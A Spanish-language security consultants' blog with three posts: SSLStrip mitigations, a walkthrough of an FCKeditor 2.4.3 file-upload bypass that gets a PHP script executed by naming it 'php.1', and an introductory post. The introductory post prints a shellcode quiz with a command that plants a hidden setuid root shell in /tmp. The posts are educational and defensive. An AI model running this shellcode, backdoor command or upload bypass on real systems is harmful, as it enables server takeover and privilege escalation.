Es importante mencionar que SSL no está roto, la debilidad (ya que no es una vulnerabilidad) de la que SSLStrip se aprovecha se encuentra en todo el contexto: usuarios no concientizados, portales Web con malos diseños que intentan presentar una idea de seguridad, navegadores, protocolos,etc.

Cabe resaltar que los mecanismos de autenticación que emplean tokens OTP no se encuentran a salvo de este tipo de ataques, pues una vez autenticados podemos usar las cookies de sesión y utilizar los recursos privados, a los cuales no deberíamos tener acceso.

Existen varios métodos para evitar este tipo de ataques, pero en todos es necesario que los usuarios sean concientizados. Entre los métodos para evitar este ataque tenemos:

Desde el lado del cliente:

Escribir directamente https en la barra de direcciones, con esto primero iniciamos un canal cifrado y dentro de dicho canal se envían las peticiones http, si algún proxy intenta suplantar al servidor o modificar la información que viaja por este canal, el usuario podrá percatarse de ello gracias a las advertencias de los navegadores.

Verificar la información de seguridad de la web mostrada por el navegador, es decir verificar que se esté usando https, se puede usar https y confundir al usuario usando una técnica llamada homograph attack, pero no si el sitio web usa certificados de validación extendida.

Desde el lado del servidor:

Evitar usar páginas de autenticación en HTTP con envío a HTTPS o HTTP.

Evitar el uso de frames, iframes.

No usar contenido sin cifrar dentro de una web con https, por ejemplo si desean usar alguna imagen, un archivo de javaxript o cualquier otro control, deben ser solicitados vía HTTPS.

Recordar a los desarolladores que poner un gif de un candadito al costado de donde ingresan las credenciales no convierte a la página en segura.

En aplicaciones donde se manejan datos muy valiosos se puede considerar implementar la autenticación mutual con certificados.

En las páginas donde el usuario ingresa información sensible, personal o confidencial, se debe prohibir el tráfico http y por defecto usar HTTPS.

Bueno, eso es todo por ahora, agradecimientos a CC por la ayuda más técnica, hasta otra ocasión.

Vulnerabilidades en FCKeditor

2009-03-01T14:35:00.003-05:00

Luego de una buena introducción, empezamos con los posts más técnicos.
Iniciamos con algunas vulnerabilidades bastante sencillas y de criticidad elevada. Estas vulnerabilidades son aún encontradas en muchos servidores Web, tanto de instituciones públicas como privadas en todo el mundo.

Basados en una reciente evaluación, empecemos analizando un editor muy usado por diversas aplicaciones y por desarrolladores. Nos referimos a FCKeditor.

FCKeditor es un editor de texto Open Source del tipo WYSIWYG (What you see is what you get), muy parecido a editores ya conocidos como MS Word o el propio Google Docs. Lo interesante de este editor es que no necesita instalación alguna en el cliente: se basa en el servicio HTTP, es decir, a través de un browser, el usuario puede crear y modificar documentos de texto que luego pueden ser exportados y descargados. Este editor es compatible con la gran mayoría de navegadores conocidos incluyendo a Internet Explorer,
Firefox, Safari, Opera y Netscape.

Algunas de sus características son:
• Generación de código XHTML 1.0
• Soporte CSS
• Incorporar formularios
• Formateo de Fuente
• Cortar, copiar, pegar
• Inserción de imágenes
• Creación de tablas
• Menús contextuales con botón derecho
• Entre otras características

FCKeditor se basa en un núcleo escrito en JavaScript, pero, tambíén es implementado con tecnologías de lado servidor como Asp, Asp.net, Java, PHP, entre otros. Es así que este editor se convierte en una opción para aquel administrador de red que necesite implementar este tipo se soluciones en sus organizaciones.

Ahora viene lo bueno :P, dentro de sus cualidades y al igual que otros muchos sistemas, FCKeditor permite la carga de archivos. En las siguientes líneas veremos cómo es posible vulnerar la carga de archivos de una manera muy simple, para poder ejecutar scripts php. La versión de FCKEditor que hemos utilizado para las pruebas es la 2.4.3 (debido a que es la más desplegada, aunque la 2.6.4 es la más reciente).

Hemos usado una configuración por defecto (como hace el 99.9% de los instaladores), con el connector de carga de archivos habilitado. No está demás aclarar que la información expuesta en este documento es para fines exclusivamente educativos y deberia ser usada por los administradores y desarrolladores de sitios web a fin de solucionar y prevenir posibles intrusiones.

Bien, primero el mensaje "About" que nos muestra la versión utilizada en las pruebas.

El path en donde se encuentra el script que permite la carga de archivos es normalmente el siguiente:

/fckeditor/editor/filemanager/upload/php/upload.php

Como se muestra en la imagen, intentamos subir un archivo php al servidor. El motor de FCKEditor reconoce a esta extensión como no válida y lanza el error "Invalid File". Uy! no podemos hacer nada... o si??. Pues bien, vamos a algo más profundo analizando el código.

Revisemos config.php

 $Config['AllowedExtensions']['File'] = array() ;  
 $Config['DeniedExtensions']['File'] =  
 array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp',  
 'cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis','sh','shtml','shtm','phtm') ;  
 $Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;  
 $Config['DeniedExtensions']['Image'] = array() ;  
 $Config['AllowedExtensions']['Flash'] = array('swf','fla') ;  
 $Config['DeniedExtensions']['Flash'] = array() ;

Primera observación, si bien es cierto que no es vulnerabilidad, pero sí una mala práctica : permitir todo y tener excepciones de negación. Tomemos como analogía el caso típico de la configuración correcta de un firewall : "denegar todo y luego hacer excepciones de permitir". Como vemos, en este caso, se hace lo contrario, debido a que permite cualquier archivo que no tenga como extensión alguna que este prohibida explícitamente, es decir, se usa una política de aceptar todo y denegar excepciones. Imagínese que desea que sus
usuarios carguen sólo documentos, ¿por qué habría de permitirles que carguen un archivo con extensión "1" o "abc"?.

Analizamos uplodad.php

 // Get the extension.  
 $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;  
 $sExtension = strtolower( $sExtension ) ;

He aquí el problema. Para determinar la extensión, lo que se hace es tomar los caracteres luego del punto "." en el archivo. Luego de esto, la extensión en la variable $sExtension es buscada en los arreglos de denegados o permitidos para determinar sí el archivo sera cargado o no.

Aquí podemos indicar un punto importante, no debemos fiarnos del tipo de archivo sólo por la extensión, debemos tener en cuenta el tipo de archivo (mime-type), en php podemos usar la sigueinte sentencia para obtener el tipo de archivo: $_FILES['attachement']['type']

Por ejemplo si deseamos que nuestros usuarios carguen imágenes, entonces primero debemos permitir sólo las extensiones de imágenes que según nuestras políticas de seguridad deban ser permitidas. Luego, debemos verificar el mime-type y por último podemos verificar que sea una imágen válida intentando obtener (mediante código, en tiempo de ejecución) las dimensiones de la misma.

Es asi que si creamos un archivo con una distinta extensión con un pequeño script en php. Notemos que la extensión usada fue "php.1":

La carga de archivos se realizada exitosamente!. Ahora tan sólo tenemos que llamar al archivo desde el browser. Cómo saber cual es la ruta de subida? Afortunadamente FCKEditor nos evita la tarea de determinar dónde y lo muestra en "Uploaded File URL".

Como vemos, el script php fue ejecutado. Por lo tanto vemos otra mala práctica : no debemos permitir la ejecución de archivos cargados por los usuarios. Es decir, debemos aplicar el principio del mínimo privilegio (least privilege). Tenga en cuenta que no siempre es necesario cargar los archivos en un sítio público o que pueda ser accedido públicamente, en ocasiones puede cargar el archivo y sólo ser visto en la red local, o ser visto sólo por las personas que lo requieran.

En este caso hemos cargado un simple hello world, para los que están metidos en esto, se les debe hacer conocido la famosa c99.php que ya permite acciones para la elevación de privilegios.

Las posibilidades con la carga de archivos son muchísimas, desde un simple defacement (aunque bastante publicitados), usar el servidor como un nodo de ataque o tomar control de la red entera.

Recuerden que un atacante que busca algo específico (pueden ser espías, modificar data por dinero, delincuentes, etc) evitará en todo momento ser detectado, por ello, es una buena práctica tener un hash de cada archivo de su aplicación Web.

Tal vez el administrador nunca llegue a enterarse de este tipo de ataques sigilosos, pero pueden causar muchísimo daño, asi que no sólo debemos preocuparnos por los defacers. El advisor que explica el problema puede ser encontrado en

http://secunia.com/advisories/27123/

A modo de conclusión, consideramos necesario resaltar que existen muchas soluciones/sistemas que usan FCKeditor y debemos tener en cuenta que no siempre nos preocupamos por actualizarlos. Por ejemplo en su organización tienen una intranet hecha a la medida, para esta intranet no hay actualizaciones, pero se ha usado FCKeditor, entonces deberían actualizar y configurar apropiadamente este editor, pues representa un vector de ataque de
muy fácil explotación.

La información mostrada en este post contiene vulnerabilidades que son comunes en la mayoría de aplicaciones de carga de archivos (por ejemplo: los muy conocidos avatares en foros y comunidades), por lo tanto, deben ser bastante cuidadosos al momento de usar estafuncionalidad y en el caso de los desarrolladores, siempre tengan en cuenta la seguridad.

De Hacking, Toolz y algo más...

2009-02-13T18:11:00.000-05:00

Me pidieron iniciar este blog con un buen "floro" y aunque no tenía mucho de que escribir en este momento, un par de correos me motivaron.

El espíritu de este blog será compartir conocimiento, algo que hacemos a menudo, pero, no siempre de esta forma pública y grupal (tengo un blog personal que no recibe mis descargas pasionarias e intelectuales desde diciembre del 2008).

Somos un grupo de consultores (ya algún lector dira : ah! pense que eran hackers! son simples consultores!) que tienen mucho por compartir gracias a la experiencia ganada por las exigencias de los proyectos que hemos ejecutado y por el interés con que despertamos todos los días por aprender MAS (si es que dormimos...).

En este blog esperamos compartir lo que hemos aprendido utilizando herramientas hechas por otros, como hemos modificado algunas de estas herramientas, herramientas y scripts hechos por nosotros (más que nada scripts) y como se desenvuelve nuestro mundo de ethical hacking.

Uno de los correos que recibí hoy indicaba que una persona desestimaba nuestros servicios por el 99.9% de las herramientas que utilizamos son Software Libre, que es más barato contratar una empresa o persona que corra esas herramientas. No quiero ni saber que piensa sobre aquellos que usan herramientas comerciales.

Este correo me llevo a analizar dos cosas :

1. Qué tanto sabe la gente técnica y aquellos "hackers" (si, los hackers de blog, los pirañas de cabina, genios de baúl, palomillas de MS Windows, gurues de acequia, consultores "con vasta experiencia", instructores copy-paste) sobre hacking en seguridad informática ? Conocen Nessus ? Claro! Pero, saben que hace cada simplón checkbox de Nessus ? Han usado Metagoofil ? Estan seguros que no hay PDFs y/o metadata en ese website revisado con Metagoofil ? Es mejor un escaner de puertos rapido ? Saben como manejar tiempos en un simple escaneo de puertos ?
Saben que hace esto ? :
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Creen que MetaSploit es EL framework para lanzar ataques ? (en realidad es lo mejor que hay para analizar exploits y payloads)
Hasta ahora nos habiamos limitado a compartir estos conocimientos en charlas, cursos, talleres y conversaciones. Este blog nos permitirá hacerlo de forma más extensiva.
Aca valga una aclaración : las herramientas que hemos modificado solamente son usadas en nuestro trabajo y no hemos hecho públicos los cambios debido a que no tenemos el tiempo para participar como se debe de los proyectos que las han creado y mantienen.

2. Cuán maltratada esta la labor de los consultores ? Esta parte es bien importante porque de nada sirve hacer un buen trabajo de ethical hacking, encontrar y explotar vulnerabilidades si los resultados de la evaluación no le sirven a la organización evaluada.
Esto es un tema que pasa desde el uso de metodologías hasta las técnicas de trabajo en equipo, pero, en un medio tan nuevo para nosotros latinos (salvo algunos paises), no es fácil hacer que las organizaciones entiendan que un consultor si puede tener conocimientos avanzados como un hacker (sin mayor definición complementaria) y que sus recomendaciones son eminentemente técnicas.
También entregaremos mucha información que permita reinvidicar a nuestros queridos Whitehats (bueno, si alguno lavo su sombrero y quedo blanco, también es Whitehat o no ?)

A bloggear!!!!

Este blog deberá servir además como una forma de comunicar temas técnicos, algunas veces simples traducciones de otras novedades porque hay mucha gente que no domina aún el idioma Inglés, Alemán o Francés (no necesiriamente representan los idiomas más usados, pero, son los que manejamos en Open-Sec). Siempre se indicarán los créditos, acá no se "robarán" posts ni se presentarán genialidades como propias si no lo son.